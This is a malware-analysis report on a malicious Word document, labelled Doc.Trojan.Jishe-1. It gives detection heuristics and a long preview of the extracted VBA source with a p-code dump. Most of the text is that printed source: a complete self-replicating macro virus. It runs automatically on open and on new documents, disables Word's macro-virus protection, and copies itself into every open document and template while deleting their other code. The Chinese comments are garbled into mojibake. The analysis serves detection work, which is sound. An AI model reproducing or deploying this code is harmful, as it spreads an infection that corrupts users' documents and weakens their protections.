MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros, including AutoOpen and Document_Open, which are indicative of malicious intent. The macros appear to be designed to infect other documents and potentially download additional payloads, as suggested by the presence of strings like 'club@263.net' which could be used for C2 communication or payload retrieval. The ClamAV detection further supports the malicious classification.
Heuristics 6
-
ClamAV: Doc.Trojan.Jishe-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Jishe-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
If LinesofCode > 0 Then xItem.CodeModule.DeleteLines 1, LinesofCode -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46577 bytes |
SHA-256: 092270dd16cf10d5c8b1b57a100f8ad58c5c92d11ae54756295325b5fa670064 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'ŐâĘDZľČËѧϰÖĆ×÷µÄŇ»¸öşę˛ˇ¶ľ·ŔɱłĚĐň,ËüżÉŇÔ·ŔÖą˛ż·ÖWORDşę˛ˇ¶ľµÄ¸ĐČľ
'ŐâĐčŇŞÓĐ´óÁżµÄşę˛ˇ¶ľĚŘŐ÷Âë×÷ÎŞŇŔľÝ,ČçąűÄă·˘ĎÖÓбľŇßĂçÎŢÄÜÎŞÁ¦µÄşę˛ˇ¶ľ
'¸ĐĐ»ÄúĽ°Ę±ÓëÎŇÁŞĎµ,ÄăҲżÉŇÔ×ÔѡĐ޸ıľłĚĐň,ŇÔĽÓÇż±ľŇßĂçµÄą¦Á¦
'Ó벡¶ľ×÷¶·ŐůľÍČçͬµÖÓůÉç»á·¸×ď,ĐčŇŞ´óĽŇµÄą˛Í¬Ĺ¬Á¦
'»¶ÓĽÓČëĆäÖв˘łÉÎŞŇ»Ăűսʿ,ҲĐíÄăŐýĘÇ´óĽŇĆÚ´ýŇѾõÄÓÂĘż
'łĚĐňÉčĽĆ: Ľ˝É÷»Ş
'°ěą«µç»°:
'ŇÁĂõŘÖ·: club@263.net
Option Explicit 'łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ
Const answer0 = "FreeWordMacroVirusKiller" '±ŁłÖÓëŇÔÇ°°ć±ľµÄĽćČÝĐÔ
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0" '±ľłĚĐň±ęÖľ
'Version 2.0
Private Sub Document_Open()
CloseVirusProtection
'Ľě˛é´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
Attribute VB_Name = "JiShenhua"
'ŐâĘDZľČËѧϰÖĆ×÷µÄŇ»¸öşę˛ˇ¶ľ·ŔɱłĚĐň,ËüżÉŇÔ·ŔÖą˛ż·ÖWORDşę˛ˇ¶ľµÄ¸ĐČľ
'ŐâĐčŇŞÓĐ´óÁżµÄşę˛ˇ¶ľĚŘŐ÷Âë×÷ÎŞŇŔľÝ,ČçąűÄă·˘ĎÖÓбľŇßĂçÎŢÄÜÎŞÁ¦µÄşę˛ˇ¶ľ
'¸ĐĐ»ÄúĽ°Ę±ÓëÎŇÁŞĎµ,ÄăҲżÉŇÔ×ÔѡĐ޸ıľłĚĐň,ŇÔĽÓÇż±ľŇßĂçµÄą¦Á¦
'Ó벡¶ľ×÷¶·ŐůľÍČçͬµÖÓůÉç»á·¸×ď,ĐčŇŞ´óĽŇµÄą˛Í¬Ĺ¬Á¦
'»¶ÓĽÓČëĆäÖв˘łÉÎŞŇ»Ăűսʿ,ҲĐíÄăŐýĘÇ´óĽŇĆÚ´ýŇѾõÄÓÂĘż
'łĚĐňÉčĽĆ: Ľ˝É÷»Ş
'°ěą«µç»°:
'ŇÁĂõŘÖ·: club@263.net
Option Explicit 'łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ
Public pVirusReport As String '˛ˇ¶ľĂčĘöĐĹϢ
Private Const cMyID As String = "MyMacroVirusKillerV2.0" '±ľłĚĐň´úÂë±ęÖľ
Private Const cMyModule As String = "JiShenhua" '±ľłĚĐňµÄÄŁżéĂűłĆ
Private Const cMyUserForm As String = "VirusReport" '±ľłĚĐňµÄÓĂ»§´°żÚĂűłĆ
Private Const cOK As Integer = 0 'Ň»ÇĐŐýłŁ
Private Const cDocHasModuleElse As Integer = 1 'ÓĐĆäËűÄŁżé´ćÔÚ
Private Const cDocHasCodeElse As Integer = 2 'ÔÚThisDocumentÄŁżéÖĐÓĐĆäËű´úÂë´ćÔÚ
Private Const cDocHasAllElse As Integer = 3 'ÔÚThisDocumentÄŁżéÖĐÓĐĆäËű´úÂë´ćÔÚŁ¬˛˘ÓĐĆäËűÄŁżé´ćÔÚ
Private Const cDocProtected As Integer = 4 '¸ĂÎĵµ±»±Ł»¤
'´ňżŞÎĵµĘ±×Ô¶ŻÖ´ĐĐ
Sub AutoOpen()
CloseVirusProtection
'Ľě˛é´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ,ČçąűÓвˇ¶ľŁ¬ĎňÓĂ»§Ěáłö±¨¸ć
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
'Đ½¨ÎĵµĘ±×Ô¶ŻÖ´ĐĐ
Sub AutoNew()
CloseVirusProtection
Infect Word.ActiveDocument
End Sub
'ąŘ±ŐWORD֮ǰÇĺŔíautoexec.dotÎÄĽţÖеIJˇ¶ľ
Sub AutoExit()
Const AutoDotFile = "C:\AUTOEXEC.DOT"
If Dir(AutoDotFile) <> "" Then
Kill AutoDotFile
End If
End Sub
'´ÓÖ¸¶¨ÎÄĽţÖĐĎňËůÓĐ´ňżŞÎĵµĽ°ÄŁ°ĺÖи´ÖƱľłĚĐň´úÂ뼰ģżé
Public Function InfectAll() As Boolean
Dim myDoc As Document, myTemp As Template
'Ďň´ňżŞµÄÎĵµÖĐĐ´Č뱾´úÂë
For Each myDoc In Documents
Infect myDoc
Next myDoc
'ĎňWORDÄŁ°ĺÖĐĐ´Č뱾´úÂë
For Each myTemp In Templates
Infect myTemp
Next myTemp
InfectAll = True
End Function
'ÇĺłýËůÓĐ´ňżŞÎĵµĽ°ÄŁ°ĺÖеIJˇ¶ľÄŁżéĽ°´úÂë
Public Function ClearVirus() As Boolean
Dim i As Integer
Dim myDoc As Document, myTemp As Template
Dim Cleared As Boolean
ClearVirus = True
'Ľě˛éËůÓĐÎĵµ˛˘Çĺłý
For Each myDoc In Documents
Cleared = ClearDocument(myDoc)
If Not Cleared Then
MsgBox "˛ˇ¶ľÇĺłýą¤×÷˛»łÉą¦Ł¬ÇëĽě˛éÔŇňˇŁ", vbOKOnly, myDoc.Name
ClearVirus = False
End If
Next myDoc
'Ľě˛éËůÓĐÄŁ°ĺ˛˘Çĺłý
For Each myTemp In Templates
Cleared = ClearDocument(myTemp)
If Not Cleared Then
MsgBox "˛ˇ¶ľÇĺłýą¤×÷˛»łÉą¦Ł¬ÇëĽě˛éÔŇňˇŁ", vbOKOnly, myTemp.Name
ClearVirus = False
End If
Next myTemp
End Function
'Ľě˛éËůÓĐ´ňżŞµÄÎĵµĽ°ÄŁ°ĺÖĐĘÇ·ńÓвˇ¶ľ´ćÔÚŁ¬ČçąűÓĐŁ¬·µ»Ř˛ˇ¶ľĐĹϢĂčĘö×Ö·ű´®
Public Function ScanVirus() As Boolean
Dim DocsCount As Integer, i As Integer, ret As Integer
Dim myStr As String
Dim myDoc As Document, myTemp As Template
ScanVirus = False
pVirusReport = ""
'Ľě˛éËůÓĐ´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ
For Each myDoc In Documents
ret = ScanDocument(myDoc)
Select Case ret
Case cOK, cDocProtected
Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
ScanVirus = True
Case Else
MsgBox "şŻĘýScanDocument·µ»Ř´íÎó´úÂ룬ϵͳÎŢ·¨Ę¶±đˇŁ", vbOKOnly, "ϵͳłö´í"
End Select
Next myDoc
'Ľě˛éËůÓĐÄŁ°ĺ
For Each myTemp In Templates
ret = ScanDocument(myTemp)
Select Case ret
Case cOK, cDocProtected
Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
ScanVirus = True
Case Else
MsgBox "şŻĘýScanDocument·µ»Ř´íÎó´úÂ룬ϵͳÎŢ·¨Ę¶±đˇŁ", vbOKOnly, "ϵͳłö´í"
End Select
Next myTemp
End Function
'ąŘ±ŐWordşę˛ˇ¶ľ±Ł»¤ą¦ÄÜ
Public Function CloseVirusProtection(Optional Protected As Boolean = False)
Options.VirusProtection = Protected
End Function
'°Ń±ľłĚĐň´úÂë´ÓŇ»¸öÎÄĽţ¸´ÖƵ˝ÁíŇ»¸öÎÄĽţÖĐ
Private Function Infect(TargetFile) As Boolean
Dim xItem, CommandStr As String, file As String
Dim myDoc As Document, myTemp As Template
Dim LinesofCode As Long, myStr As String
'Ľě˛é˛ÎĘýŔŕĐÍĘÇ·ńŐýČ·
myStr = TypeName(TargetFile)
If myStr <> "Document" And myStr <> "Template" Then
MsgBox "ĘąÓĂĘýľÝŔŕĐÍ" + myStr + "µ÷ÓĂşŻĘýInfectŁ¬ĎµÍłÖ»ÔĘĐíĘąÓĂDocumentĽ°TemplateŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Infect = False
Exit Function
End If
Infect = True
If TargetFile.Name = ThisDocument.Name Then Exit Function 'Äż±ęÎÄĽţÓëÔ´ÎÄĽţĎŕͬʱ˛»Ö´ĐĐĐ´Čë˛Ů×÷
If Infected(TargetFile) Then Exit Function 'Äż±ęÎÄĽţŇŃľ´ćÔÚ±ľłĚĐň´úÂë
If TargetFile.VBProject.Protection Then Exit Function 'Äż±ęÎÄĽţ±»±Ł»¤Ł¬˛»ÄÜÖ´ĐĐĐ´Čë˛Ů×÷
Infect = False
'ÇĺłýÄż±ęÎĵµÖĐŇŃľ´ćÔÚµÄĆäËűÄŁżéĽ°´úÂë
For Each xItem In TargetFile.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.CodeModule.CountOfLines
If LinesofCode > 0 Then xItem.CodeModule.DeleteLines 1, LinesofCode
Else
TargetFile.VBProject.VBComponents.Remove xItem
End If
Next xItem
'ĎňÎĵµÖĐĐ´Č뱾łĚĐň´úÂ뼰ģżé
WordBasic.macrocopy ThisDocument.FullName + ":" + cMyModule, TargetFile.FullName + ":" + cMyModule
WordBasic.macrocopy ThisDocument.FullName + ":" + cMyUserForm, TargetFile.FullName + ":" + cMyUserForm
' ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^
'¸ĂłĚĐň¶ÎČçąű·ĹÔÚÇ°Á˝¸öÓďľä֮ǰŁ¬ľÍ»áµĽÖÂVBA32.DLLłĚĐňłöĎÖÖÂĂü´íÎó¶řËŔ»úŁ¬
'ÇîÎŇÖ®±ĎÉú±ŕłĚľŃ飬˛»ÖŞşÎąĘŁ¬ĚěÄÄŁˇĚěŔíşÎÔÚŁż
LinesofCode = ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
myStr = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(1, LinesofCode)
TargetFile.VBProject.VBComponents(1).CodeModule.InsertLines 1, myStr
Infect = True
End Function
'Ľě˛éÖ¸¶¨ÎĵµÖĐĘÇ·ńŇŃľÓбľłĚĐň´úÂë
Private Function Infected(TargetFile)
Dim xItem, LinesofCode As Integer
Dim HasVirus As Integer
Dim myType As String
myType = TypeName(TargetFile)
If myType <> "Document" And myType <> "Template" Then
MsgBox "ĘąÓĂĘýľÝŔŕĐÍ" + myType + "µ÷ÓĂşŻĘýInfectedŁ¬ĎµÍłÖ»ÔĘĐíĘąÓĂDocumentĽ°TemplateŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Infected = True
Exit Function
End If
'Ľě˛éÄż±ęÎĵµĘÇ·ń±»±Ł»¤
If TargetFile.VBProject.Protection Then
Infected = True
Exit Function
End If
'µ±ThisDocument,myModule,myUserFormľů´ćÔÚʱŁ¬±íĘľ¸ĂÎÄĽţŇŃľ±»¸ĐČľ
HasVirus = 0
For Each xItem In TargetFile.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.CodeModule.CountOfLines
If (LinesofCode > 0) And (xItem.CodeModule.Find(cMyID, 1, 1, 1 + LinesofCode, 1)) Then
HasVirus = HasVirus Or 1
End If
ElseIf xItem.Name = cMyModule Then
HasVirus = HasVirus Or 2
ElseIf xItem.Name = cMyUserForm Then
HasVirus = HasVirus Or 4
End If
Next xItem
If HasVirus = 7 Then
Infected = True
Else
Infected = False
End If
End Function
'Ľě˛éÖ¸¶¨µÄ´ňżŞÎĵµĽ°ÄŁ°ĺÖĐĘÇ·ńÓвˇ¶ľ´ćÔÚ
Private Function ScanDocument(myDocOrTemp) As Integer
Dim xItem, i As Integer, myStr As String
Dim LinesofCode As Integer
ScanDocument = cOK
'Ľě˛é˛ÎĘýŔŕĐÍĘÇ·ńŐýČ·
If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
MsgBox "µ÷ÓĂşŻĘýScanDocumentÖ»ÄÜĘąÓĂDocumentĽ°TemplateĘýľÝŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Exit Function
End If
myStr = myDocOrTemp.Name + "Ľě˛é˝áąűŁş" + Chr(10)
'Ľě˛éłĚĐňÄŁżéĘÇ·ń±»±Ł»¤
If myDocOrTemp.VBProject.Protection Then
ScanDocument = cDocProtected
myStr = myStr + " ÎÄĽţÖеijĚĐň´úÂë±»±Ł»¤Ł¬ĎµÍłÎŢ·¨×Ô¶Ż˛éɱŁ¬µ«Ň˛żÉÄÜ´ćÔÚ˛ˇ¶ľŁ¬ÇëСĐÄŁˇ" + Chr(10)
Exit Function
End If
For Each xItem In myDocOrTemp.VBProject.VBComponents
If (xItem.Name = "ThisDocument") Then
'´Ë˛ż·ÖÓĐ´úÂëʱŁ¬ČçąűŐҲ»µ˝±ľÄŁżé±ęÖľÔňČ϶¨ÎŞ˛ˇ¶ľ
LinesofCode = xItem.CodeModule.CountOfLines
If (LinesofCode > 0) And (Not xItem.CodeModule.Find(cMyID, 1, 1, 1 + LinesofCode, 1)) Then
ScanDocument = ScanDocument Or cDocHasCodeElse
myStr = myStr + " <" + xItem.Name + ">¶ÔĎóÖĐÓĐĆäËűłĚĐň´ćÔÚŁ¬´ó¸ĹĘDzˇ¶ľˇŁ" + Chr(10)
End If
ElseIf (xItem.Name <> cMyModule) And (xItem.Name <> cMyUserForm) Then
'ÎĵµÖĐłý±ľÄŁżé´úÂëÖ®Í⣬Čçąű»ąÓĐĆäËü´úÂëÔňČ϶¨ÎŞ˛ˇ¶ľ
ScanDocument = ScanDocument Or cDocHasModuleElse
myStr = myStr + " ÓĐĆäËűÄŁżé<" + xItem.Name + ">´ćÔÚŁ¬Ľ«ÓĐżÉÄÜĘDzˇ¶ľˇŁ" + Chr(10)
End If
Next
If ScanDocument = cOK Then myStr = myStr + " Ă»Óвˇ¶ľŁ¬Çë·ĹĐÄĘąÓáŁ" + Chr(10)
pVirusReport = pVirusReport + myStr
End Function
'ÇĺłýÖ¸¶¨µÄ´ňżŞÎĵµĽ°ÄŁ°ĺÖеIJˇ¶ľÄŁżéĽ°´úÂë
Private Function ClearDocument(myDocOrTemp) As Boolean
Dim xItem, LinesofCode As Integer
ClearDocument = False
'Ľě˛é˛ÎĘýŔŕĐÍĘÇ·ńŐýČ·
If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
MsgBox "µ÷ÓĂşŻĘýClearDocumentÖ»ÄÜĘąÓĂDocumentĽ°TemplateĘýľÝŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Exit Function
End If
If myDocOrTemp.VBProject.Protection Then
ClearDocument = True
Exit Function
End If
'Ľě˛éÎĵµĘÇ·ńÓвˇ¶ľ
If ScanDocument(myDocOrTemp) Then
For Each xItem In myDocOrTemp.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.CodeModule.CountOfLines
If (LinesofCode > 0) And (Not xItem.CodeModule.Find(cMyID, 1, 1, 1 + LinesofCode, 1)) Then
xItem.CodeModule.DeleteLines 1, LinesofCode
End If
ElseIf xItem.Name <> cMyModule And xItem.Name <> cMyUserForm Then
myDocOrTemp.VBProject.VBComponents.Remove xItem
End If
Next
End If
ClearDocument = True
End Function
Attribute VB_Name = "VirusReport"
Attribute VB_Base = "0{DB93C28D-70D0-11D5-BD50-005056C31397}{DB93C274-70D0-11D5-BD50-005056C31397}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'´°ĚĺłĚĐň´úÂë
Option Explicit 'łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ
'´ňżŞ´°ĚĺʱִĐеIJŮ×÷
Private Sub UserForm_Initialize()
CheckBox1.Value = True
Information.Value = pVirusReport
Beep
End Sub
'ąŘ±Ő´°Ě壬˛»×÷Čκδ¦Ŕí
Private Sub CommandButtonNothing_Click()
Dim ret As Integer
ret = MsgBox("Á쵼Ł¬ËäČ»ÄăżÉÄÜ»áĹúĆŔÎŇŁ¬µ«»ąĘÇŇŞ¸ćËßÄ㣬ŐâŃů×öĘÇşÜÎŁĎյġŁĘÇ·ńŐćµÄ˛»×ö´¦ŔíŁ¬ÇëĹúĘľˇŁ", vbYesNo + vbDefaultButton2, "Ôٴα¨¸ćŁˇ")
If ret = vbYes Then
Unload Me
End If
End Sub
'´ňżŞVisulBasic±ŕĽĆ÷
Private Sub CommandButtonOpenVisubasic_Click()
ShowVisualBasicEditor = True
End Sub
'ɱ˛ˇ¶ľ
Private Sub CommandButtonKill_Click()
If ClearVirus Then
ResetMenu
InfectAll
Unload Me
MsgBox "°´ŐŐÄúµÄָʾŁ¬ÎŇŇŃľ°ŃżÉÄÜĘDzˇ¶ľµÄ¶«¶«Č«˛żÇĺŔíÍę±ĎŁ¬˛»ąýҲżÉÄÜşĂĐÄ°ěÁË»µĘÂŁ¬Äǿɲ»ŇŞąÖÎŇÓ´ˇŁ", vbOKOnly, "±¨¸ćŁˇ"
Else
MsgBox "˛»ÖŞĘ˛Ă´ÔŇňŁ¬Çĺłý˛ˇ¶ľą¤×÷˛»łÉą¦Ł¬ÇëÄúĘÖą¤Ľě˛é»ňÓëÎŇÁŞĎµˇŁ", vbOKOnly, "Ľ˝É÷»ŞĎňÄú±¨¸ćŁş"
Unload Me
End If
End Sub
'»Ö¸´±»˛ˇ¶ľ¸ü¸ÄµÄ˛ËµĄĎî
Private Function ResetMenu()
Dim mItem, cItem, myKey As KeyBinding
CustomizationContext = NormalTemplate
'Alt+F8:´ňżŞşę¶Ô»°żň
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
'Alt+F11:´ňżŞVisualBasic±ŕĽĆ÷
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
FindKey(BuildKeyCode(wdKeyAlt, wdKeyH)).Clear
FindKey(BuildKeyCode(wdKeyAlt, wdKeyK)).Clear
'»Ö¸´ą¤ľß˛ËµĄµÄÔĘĽÉčÖĂ
For Each mItem In CommandBars("Tools").Controls
mItem.Reset
Next mItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.Reset
Next cItem
For Each cItem In CommandBars
If cItem.Visible = True Then
cItem.Protection = msoBarNoProtection
End If
Next cItem
End Function
' Processing file: /tmp/qstore_vrmt4ibv
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2937 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0043 "ŐâĘDZľČËѧϰÖĆ×÷µÄŇ»¸öşę˛ˇ¶ľ·ŔɱłĚĐň,ËüżÉŇÔ·ŔÖą˛ż·ÖWORDşę˛ˇ¶ľµÄ¸ĐČľ"
' Line #2:
' QuoteRem 0x0000 0x0045 "ŐâĐčŇŞÓĐ´óÁżµÄşę˛ˇ¶ľĚŘŐ÷Âë×÷ÎŞŇŔľÝ,ČçąűÄă·˘ĎÖÓбľŇßĂçÎŢÄÜÎŞÁ¦µÄşę˛ˇ¶ľ"
' Line #3:
' QuoteRem 0x0000 0x003C "¸ĐĐ»ÄúĽ°Ę±ÓëÎŇÁŞĎµ,ÄăҲżÉŇÔ×ÔѡĐ޸ıľłĚĐň,ŇÔĽÓÇż±ľŇßĂçµÄą¦Á¦"
' Line #4:
' QuoteRem 0x0000 0x0031 "Ó벡¶ľ×÷¶·ŐůľÍČçͬµÖÓůÉç»á·¸×ď,ĐčŇŞ´óĽŇµÄą˛Í¬Ĺ¬Á¦"
' Line #5:
' QuoteRem 0x0000 0x0037 "»¶ÓĽÓČëĆäÖв˘łÉÎŞŇ»Ăűսʿ,ҲĐíÄăŐýĘÇ´óĽŇĆÚ´ýŇѾõÄÓÂĘż"
' Line #6:
' QuoteRem 0x0000 0x0010 "łĚĐňÉčĽĆ: Ľ˝É÷»Ş"
' Line #7:
' QuoteRem 0x0000 0x0009 "°ěą«µç»°:"
' Line #8:
' QuoteRem 0x0000 0x0016 "ŇÁĂõŘÖ·: club@263.net"
' Line #9:
' Option (Explicit)
' QuoteRem 0x0010 0x001C "łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ"
' Line #10:
' Dim (Const)
' LitStr 0x0018 "FreeWordMacroVirusKiller"
' VarDefn answer0
' QuoteRem 0x002B 0x0016 "±ŁłÖÓëŇÔÇ°°ć±ľµÄĽćČÝĐÔ"
' Line #11:
' Dim (Const)
' LitStr 0x0016 "MyMacroVirusKillerV1.0"
' VarDefn answer1
' Line #12:
' Dim (Const)
' LitStr 0x0016 "MyMacroVirusKillerV2.0"
' VarDefn answer2
' QuoteRem 0x0029 0x000A "±ľłĚĐň±ęÖľ"
' Line #13:
' QuoteRem 0x0000 0x000B "Version 2.0"
' Line #14:
' FuncDefn (Private Sub Document_Open())
' Line #15:
' ArgsCall CloseVirusProtection 0x0000
' Line #16:
' QuoteRem 0x0004 0x001A "Ľě˛é´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ"
' Line #17:
' Ld ScanVirus
' IfBlock
' Line #18:
' Ld VirusReport
' ArgsCall Local 0x0001
' Line #19:
' Ld VirusReport
' ArgsMemCall Show 0x0000
' Line #20:
' ElseBlock
' Line #21:
' ArgsCall InfectAll 0x0000
' Line #22:
' EndIfBlock
' Line #23:
' EndSub
' Macros/VBA/JiShenhua - 16559 bytes
' Line #0:
' QuoteRem 0x0000 0x0043 "ŐâĘDZľČËѧϰÖĆ×÷µÄŇ»¸öşę˛ˇ¶ľ·ŔɱłĚĐň,ËüżÉŇÔ·ŔÖą˛ż·ÖWORDşę˛ˇ¶ľµÄ¸ĐČľ"
' Line #1:
' QuoteRem 0x0000 0x0045 "ŐâĐčŇŞÓĐ´óÁżµÄşę˛ˇ¶ľĚŘŐ÷Âë×÷ÎŞŇŔľÝ,ČçąűÄă·˘ĎÖÓбľŇßĂçÎŢÄÜÎŞÁ¦µÄşę˛ˇ¶ľ"
' Line #2:
' QuoteRem 0x0000 0x003C "¸ĐĐ»ÄúĽ°Ę±ÓëÎŇÁŞĎµ,ÄăҲżÉŇÔ×ÔѡĐ޸ıľłĚĐň,ŇÔĽÓÇż±ľŇßĂçµÄą¦Á¦"
' Line #3:
' QuoteRem 0x0000 0x0031 "Ó벡¶ľ×÷¶·ŐůľÍČçͬµÖÓůÉç»á·¸×ď,ĐčŇŞ´óĽŇµÄą˛Í¬Ĺ¬Á¦"
' Line #4:
' QuoteRem 0x0000 0x0037 "»¶ÓĽÓČëĆäÖв˘łÉÎŞŇ»Ăűսʿ,ҲĐíÄăŐýĘÇ´óĽŇĆÚ´ýŇѾõÄÓÂĘż"
' Line #5:
' QuoteRem 0x0000 0x0010 "łĚĐňÉčĽĆ: Ľ˝É÷»Ş"
' Line #6:
' QuoteRem 0x0000 0x0009 "°ěą«µç»°:"
' Line #7:
' QuoteRem 0x0000 0x0016 "ŇÁĂõŘÖ·: club@263.net"
' Line #8:
' Option (Explicit)
' QuoteRem 0x0010 0x001C "łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ"
' Line #9:
' Dim (Public)
' VarDefn pVirusReport (As String)
' QuoteRem 0x001E 0x000C "˛ˇ¶ľĂčĘöĐĹϢ"
' Line #10:
' Dim (Private Const)
' LitStr 0x0016 "MyMacroVirusKillerV2.0"
' VarDefn cMyID (As String)
' QuoteRem 0x0039 0x000E "±ľłĚĐň´úÂë±ęÖľ"
' Line #11:
' Dim (Private Const)
' LitStr 0x0009 "JiShenhua"
' VarDefn cMyModule (As String)
' QuoteRem 0x0030 0x0010 "±ľłĚĐňµÄÄŁżéĂűłĆ"
' Line #12:
' Dim (Private Const)
' LitStr 0x000B "VirusReport"
' VarDefn cMyUserForm (As String)
' QuoteRem 0x0034 0x0014 "±ľłĚĐňµÄÓĂ»§´°żÚĂűłĆ"
' Line #13:
' Dim (Private Const)
' LitDI2 0x0000
' VarDefn cOK (As Integer)
' QuoteRem 0x0021 0x0008 "Ň»ÇĐŐýłŁ"
' Line #14:
' Dim (Private Const)
' LitDI2 0x0001
' VarDefn cDocHasModuleElse (As Integer)
' QuoteRem 0x002F 0x000E "ÓĐĆäËűÄŁżé´ćÔÚ"
' Line #15:
' Dim (Private Const)
' LitDI2 0x0002
' VarDefn cDocHasCodeElse (As Integer)
' QuoteRem 0x002D 0x0022 "ÔÚThisDocumentÄŁżéÖĐÓĐĆäËű´úÂë´ćÔÚ"
' Line #16:
' Dim (Private Const)
' LitDI2 0x0003
' VarDefn cDocHasAllElse (As Integer)
' QuoteRem 0x002C 0x0034 "ÔÚThisDocumentÄŁżéÖĐÓĐĆäËű´úÂë´ćÔÚŁ¬˛˘ÓĐĆäËűÄŁżé´ćÔÚ"
' Line #17:
' Dim (Private Const)
' LitDI2 0x0004
' VarDefn cDocProtected (As Integer)
' QuoteRem 0x002B 0x000C "¸ĂÎĵµ±»±Ł»¤"
' Line #18:
' QuoteRem 0x0000 0x0012 "´ňżŞÎĵµĘ±×Ô¶ŻÖ´ĐĐ"
' Line #19:
' FuncDefn (Sub AutoOpen())
' Line #20:
' ArgsCall CloseVirusProtection 0x0000
' Line #21:
' QuoteRem 0x0004 0x0035 "Ľě˛é´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ,ČçąűÓвˇ¶ľŁ¬ĎňÓĂ»§Ěáłö±¨¸ć"
' Line #22:
' Ld ScanVirus
' IfBlock
' Line #23:
' Ld VirusReport
' ArgsCall Local 0x0001
' Line #24:
' Ld VirusReport
' ArgsMemCall Show 0x0000
' Line #25:
' ElseBlock
' Line #26:
' ArgsCall InfectAll 0x0000
' Line #27:
' EndIfBlock
' Line #28:
' EndSub
' Line #29:
' QuoteRem 0x0000 0x0012 "Đ½¨ÎĵµĘ±×Ô¶ŻÖ´ĐĐ"
' Line #30:
' FuncDefn (Sub AutoNew())
' Line #31:
' ArgsCall CloseVirusProtection 0x0000
' Line #32:
' Ld Word
' MemLd ActiveDocument
' ArgsCall Infect 0x0001
' Line #33:
' EndSub
' Line #34:
' QuoteRem 0x0000 0x0028 "ąŘ±ŐWORD֮ǰÇĺŔíautoexec.dotÎÄĽţÖеIJˇ¶ľ"
' Line #35:
' FuncDefn (Sub AutoExit())
' Line #36:
' Dim (Const)
' LitStr 0x000F "C:\AUTOEXEC.DOT"
' VarDefn AutoDotFile
' Line #37:
' Ld AutoDotFile
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #38:
' Ld AutoDotFile
' ArgsCall Kill 0x0001
' Line #39:
' EndIfBlock
' Line #40:
' EndSub
' Line #41:
' QuoteRem 0x0000 0x0036 "´ÓÖ¸¶¨ÎÄĽţÖĐĎňËůÓĐ´ňżŞÎĵµĽ°ÄŁ°ĺÖи´ÖƱľłĚĐň´úÂ뼰ģżé"
' Line #42:
